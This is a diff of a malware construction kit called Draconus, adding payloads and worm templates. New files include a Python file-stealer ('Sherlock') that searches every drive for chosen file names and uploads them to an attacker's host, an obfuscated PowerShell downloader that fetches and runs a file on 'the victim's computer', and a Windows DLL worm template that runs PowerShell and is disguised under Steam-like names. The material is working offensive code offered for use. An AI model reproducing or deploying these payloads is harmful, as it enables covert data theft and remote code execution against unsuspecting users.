ver 1.1

CONFIG.ini

@@ -1,6 +1,6 @@
 [CONFIG]
 #### Your machine's IP address. Draconus uses it to create servers and worms.
-IP = 192.168.100.32
+IP = 0.0.0.0
 
 #### Display of unimportant information. Draconus will not display unimportant notifications and messages from clients.
 #### A useful option when you handle many connections. 
@@ -31,6 +31,7 @@ UNIX_SOCKET_RAW_LEN = 2048
 #### Displays messages in Draconus. This option has no effect on Commander. Useful for debugging. 
 VANILLA_PRINT = False
 
+
 #### Name for DLC packs that can be installed. I do not recommend changing this option.
 DLC_FILE_NAME = DLC_
 
@@ -42,6 +43,11 @@ DLC_FILE_NAME = DLC_
 TCP_RAW_BUFFER_TIMEOUT = 2
 
 
+#### payload default encode
+PAYLOAD_DEFAULT_ENCODE = utf-8
+
+
+
 #### For dev
 [DEV]
 TASK_PAUSE_CLEAN = 1

app/conn/central.py

@@ -241,7 +241,7 @@ def send_file(self, client_id: str, fname: str) -> None:
         cli = self.get_client(client_id)
         if not cli:
             return
-        self.msg("no-imp", f"start send file: {fname}")
+        self.msg("no_imp", f"start send file: {fname}")
         send = Sender(self.draco, cli)
         send.set_params(fname)
         send.start()

app/conn/protocols/tcp_rawdown.py

@@ -21,32 +21,30 @@ def __init__(
         self.socket_timeout = socket_timeout
         self.conn.settimeout(self.socket_timeout)
         self.conn_FLAG = ["RAW_DOWNLOAD", "NO_MSG"]
-        # self.exec_cmd_FLAG = False
-        # self.no_msg_FLAG = False
-        # self.download_FLAG = True
         self.head_separator = head_separator
 
 
     def recive_data(self) -> Union[bytes, None]:
         msg = b""
         while self.working_FLAG.is_set() and self.handler_FLAG.is_set():
             try:
-                recv = self.conn.recv(self.raw_len)
+                recv = self.conn.recv(int(self.raw_len / 8))
             except TimeoutError:
                 continue
             except (OSError, ConnectionError, ConnectionAbortedError, ConnectionResetError, ConnectionRefusedError):
                 return None
             if recv:
-                if len(recv) < self.raw_len:
+                if len(recv) < int(self.raw_len / 8):
                     msg += recv
                     break
                 else:
                     msg += recv
             else:
-                return None
+                break
         if msg == b"":
             return None
         return msg
+
 
     def send_data(self, data: str) -> None:
         try:

app/hive/Lib/items/food/sherlock_files.data

@@ -0,0 +1,12 @@
+#!name##FOOD_sherlock_files
+#!types##data
+#!info##List of files to steal.
+#!load##list
+
+#!####You can put file names here. Separate the names with ENTER. #######
+#!##example:
+#!##password.txt
+#!##accounts.json
+
+
+

app/hive/Lib/items/modules/skunk.data

@@ -1,7 +1,9 @@
 #!name##Skunk
 #!types##module
 #!info##Execute binary payload. Add only binary payload
-#!reqPayload##SK_bin##Binary Payload##ENCODE:base64
+#!reqPayload##SK_bin##Binary Payload
+#!payStep##load_binary
+#!payStep##encode_bin64
 #!reqVar##process_name##Name for binary process##str
 #!setVar##process_name##steam_api##str
 

app/hive/Lib/items/payloads/bin1.data

@@ -2,3 +2,6 @@
 #!types##payload
 #!info##An executable (binary) program compiled by 'nasm x64' for Linux. It displays 'hello world'. For testing.
 #!binary##hello_asm
+#!payStep##load_binary
+#!payStep##encode_bin_hex
+

app/hive/Lib/items/payloads/hello_win_bin.data

@@ -2,4 +2,6 @@
 #!types##payload
 #!info##Executable (binary) program created in 'nasm 32' on windows. Displays a window with the word “hello world”. For test.
 #!binary##hello_win.exe
-#!setVar##EXE_LEN##7151##int
+#!setVar##EXE_LEN##7151##int
+#!payStep##load_binary
+#!payStep##encode_bin_hex

app/hive/Lib/items/payloads/my_payload.data

@@ -1,18 +1,17 @@
 #!name##My_Pyload
 #!types##payload
-#!info##A place for your own payload written in python. Go to the directory “OUTPUT/shortcuts” you will find there the file “my_payload.data” place the script there and then add it to the worm.
+#!info##A place for your own payload written in python. Go to directory “OUTPUT/shortcuts” you will find there file “my_payload.data” place the script there and then add it to the worm.
 #!render_FLAG##True
 #!import_FLAG##True
 #!empty##----------------------------------------------------------------------------------------------------------------------------------------------
 #!empty## ----- DONT REMOVE HEADERS --------
 #!empty## If your payload contains libraries that need to be downloaded via PIP then you can add a 'loader' to the payload.
-#!empty## Change the option: “PY_LOADER” to ‘True’.
-#!empty## Change the FLAG: "no_extract_FLAG to 'True'
 #!empty## Add code below the headers. Next save file and add to your worm
-#!options##PY_LOADER##False
-#!no_extract_FLAG##False
 #!CODE
 
-
+from time import sleep
+print("Hello World")
+sleep(1)
+print("END")
 
 

app/hive/Lib/items/payloads/print.data

@@ -1,9 +1,9 @@
 #!name##PPrint
 #!types##payload
-#!info##Simple payload to shellcode , displays a text. Default text is 'Hello World'
+#!info##Simple python payload for test to shellcode , displays a text. Default text is 'Hello World'
 #!render_FLAG##True
 #!reqVar##PP_text##Text to display##str
 #!setVar##PP_text##Hello World##str
 #!import_FLAG##True
 
-print("Hello")
+print("{{PP_text}}")

app/hive/Lib/items/payloads/ps_beep.data

@@ -1,12 +1,12 @@
 #!name##PS_Beep
 #!types##payload
 #!info##A script in powershell that creates an annoying sound.
-#!coderOpt##FORMAT##PS_SCRIPT
 #!reqVar##PSB_time##Duration of sound in seconds##int##INCREASE:1000
 #!setVar##PSB_time##2##str
 #!reqVar##PSB_hz##Frequency in hz of sound output.##str
 #!setVar##PSB_hz##500##str
 #!render_FLAG##True
+#!payStep##format_ps
 
 [System.Console]::Beep({{PSB_hz}},{{PSB_time}})
 Start-Sleep -milliseconds 700

app/hive/Lib/items/payloads/ps_deliver_obf.data

@@ -0,0 +1,32 @@
+#!name##PS_DeliveryObf
+#!types##payload
+#!info##Obfuscated code with random variables name in Powershell. It establishes a connection to the server, downloads the file and runs it on the victim's computer. Perfect for working with a 'send' server.
+#!reqVar##IP_ADDR##Host ip address##str
+#!reqVar##PSD_port##Host port number##int
+#!setVar##PSD_port##4444##int
+#!reqVar##PSD_fname##Name for the file stored on the victim's computer.##str
+#!setVar##PSD_fname##minecraft.exe##str
+#!garbageVar##PSDO_var1##128##randC##Variable name in chars (bytes) length
+#!garbageVar##PSDO_var2##154##randC##Variable name in chars (bytes) length
+#!garbageVar##PSDO_var3##86##randC##Variable name in chars (bytes) length
+#!garbageVar##PSDO_var4##133##randC##Variable name in chars (bytes) length
+#!garbageVar##PSDO_var5##112##randC##Variable name in chars (bytes) length
+#!garbageVar##PSDO_hip1##186##randC##Length of random string before IP address.
+#!garbageVar##PSDO_hip2##123##randC##Length of random string after IP address.
+#!garbageVar##PSDO_hfp1##177##randC##Length of random string before file path.
+#!garbageVar##PSDO_hfp2##75##randC##Length of random string after file path.
+#!render_FLAG##True
+#!payStep##format_ps
+#!lang##PowerShell
+
+${{PSDO_var1}} = '{{PSDO_hfp1}}c:/windows/temp/{{PSD_fname}}{{PSDO_hfp2}}'.Substring({{PSDO_hfp1|length}},{{PSD_fname|length + 16}})
+${{PSDO_var2}} = New-Object System.Net.Sockets.TcpClient('{{PSDO_hip1}}{{IP_ADDR}}{{PSDO_hip2}}'.Substring({{PSDO_hip1|length}},{{IP_ADDR|length}}), {{PSD_port}})
+${{PSDO_var3}} = ${{PSDO_var2}}.GetStream()
+${{PSDO_var4}} = [System.IO.File]::Create(${{PSDO_var1}})
+${{PSDO_var5}} = New-Object Byte[] 4096
+
+try { while (($bytesRead = ${{PSDO_var3}}.Read(${{PSDO_var5}}, 0, ${{PSDO_var5}}.Length)) -gt 0) {${{PSDO_var4}}.Write(${{PSDO_var5}}, 0, $bytesRead)}} finally {${{PSDO_var4}}.Close()
+    ${{PSDO_var3}}.Close()
+    ${{PSDO_var2}}.Close()}
+
+Start-Process -FilePath ${{PSDO_var1}}

app/hive/Lib/items/payloads/ps_delivery.data

@@ -1,12 +1,12 @@
 #!name##PS_Delivery
 #!types##payload
 #!info##Code in Powershell. It establishes a connection to the server, downloads the file and runs it on the victim's computer. Perfect for working with a 'send' server.
-#!coderOpt##FORMAT##PS_SCRIPT
 #!reqVar##IP_ADDR##Host ip address##str
 #!reqVar##PSD_port##Host port number##int
 #!setVar##PSD_port##4444##int
 #!reqVar##PSD_fname##Name for the file stored on the victim's computer.##str
 #!setVar##PSD_fname##minecraft.exe##str
+#!payStep##format_ps
 #!render_FLAG##True
 #!lang##PowerShell
 

app/hive/Lib/items/payloads/ps_policy.data

@@ -1,6 +1,7 @@
 #!name##PS_Policy
 #!types##payload
 #!info##A command that launches the ability to execute scripts in powershell.
-#!coderOpt##FORMAT##PS_SCRIPT
+#!payStep##format_ps
+#!lang##PowerScript
 
 Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

app/hive/Lib/items/payloads/sherlock.data

@@ -0,0 +1,82 @@
+#!name##Sherlock
+#!types##payload
+#!info##It looks for files with the specified name and uploads them to the server.
+#!import_FLAG##True
+#!render_FLAG##True
+#!reqVar##SHL_files##List of files to steal.##str
+#!setVar##SHL_files##[]##str
+#!reqFood##SHL_extra##FOOD_sherlock_files##Additional files to steal. You can add additional names to file 'sherlock_files' which is located in 'shortcuts' directory.
+#!reqVar##SHL_pause##Interval in seconds between file uploads.##int
+#!setVar##SHL_pause##1##int
+#!reqVar##IP_ADDR##Host ip address##str
+#!reqVar##SHL_port##Host port number##int
+#!setVar##SHL_port##4444##int
+
+
+import socket
+import os
+import threading
+import string
+from time import sleep
+
+
+class Sherlock:
+    def __init__(self):
+        self.base = {{SHL_files}}
+        self.base.extend({{SHL_extra}}) 
+        self.find = []
+        self.lock = threading.Lock()
+        self.diskl = string.ascii_lowercase
+        self.base_dir = [f"{l}:/" for l in self.diskl if os.path.exists(f"{l}:/")]
+
+    def _searching(self, bdirs):
+        if not os.path.exists(bdirs):
+            return
+        for root, dirs, files in os.walk(bdirs):
+            for f in files:
+                if os.path.basename(f) in self.base:
+                    self.get_loot(os.path.join(root, f))
+
+    def searching(self):
+        ls = []
+        for bd in self.base_dir:
+            l = threading.Thread(target=self._searching, args=(bd, ))
+            ls.append(l)
+            l.start()
+        for l in ls:
+            l.join()
+        self.send()
+
+
+    def get_loot(self, fpath):
+        with self.lock:
+            self.find.append(fpath)
+
+    def send(self):
+        while True:
+            if not self._connect():
+                sleep(3)
+            else:
+                break
+
+        for fi in self.find:
+            try:
+                with open(fi, "rb") as f:
+                    self.sock.sendfile(f, 0)
+                sleep({{SHL_pause}})
+            except:
+                continue
+
+    def _connect(self):
+        try:
+            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            self.sock.connect(("{{IP_ADDR}}", {{SHL_port}}))
+            return True
+        except:
+            return False
+
+    def start(self):
+        self.searching()
+
+sh = Sherlock()
+sh.start()

app/hive/Lib/items/process/basic_dll.data

@@ -0,0 +1,10 @@
+#!name##BasicDLL
+#!types##process
+#!info##Basic process to build DLL file
+
+
+
+[BASE]
+[SAVE_RAW]
+[MAKE_DLL_FILE]
+[DLL_LOADER]

app/hive/Lib/items/support/dll_launcher.data

@@ -0,0 +1,17 @@
+#!name##SDLL_Loader
+#!types##support
+#!info##The startup program, imports functions from the DLL file which causes it to execute.
+
+extern _ExitProcess@4
+{% for func in DLL_EXPORT%}
+extern _{{func}}
+{% endfor%}
+
+section .text
+    global _main
+
+_main:
+    call _{{DLL_EXPORT[0]}}
+
+    push 0
+    call _ExitProcess@4

app/hive/Lib/items/worms/arkanoid.data

@@ -0,0 +1,48 @@
+#!name##Arkanoid
+#!types##worm
+#!info##Creates a DLL library (win32) containing a payload that is triggered from second EXE file as a function. You can also create another program yourself that uses this library. You can see an example use of function in “.asm” file.
+#!lang##asm
+#!system_FLAG##[W]
+#!processWorm##BasicDLL
+#!reqVar##_DLL_NAME##DLL file name##str
+#!setVar##_DLL_NAME##steam.dll##str
+#!setVar##_DLL_FUNC_myFunc##myFunc##str
+#!setVar##_DLL_FUNC_f2##Print##str
+#!reqPayload##ARK_script##PowerShell script to execute
+#!payStep##asm_stack_build
+#!payloadOpt##ARK_script##asm_stack_build_cmd##powershell.exe -Command "$"
+#!banned##module##starter##shadow##junk
+
+extern _system
+extern _ExitProcess@4
+
+section .data
+
+section .text
+    global _myFunc
+    global _Print
+    global DllMain
+
+
+DllMain:
+    mov eax, 1
+    ret
+
+_efunc:
+    push dword 0x00000000
+    {{ARK_script}}
+    push esp
+    call _system
+    ret
+
+_myFunc:
+    xor eax, eax
+    mov eax, ebx
+    call _efunc
+    ret
+
+_Print:
+    xor ebx, ebx
+    xor eax, eax
+    call _efunc
+    ret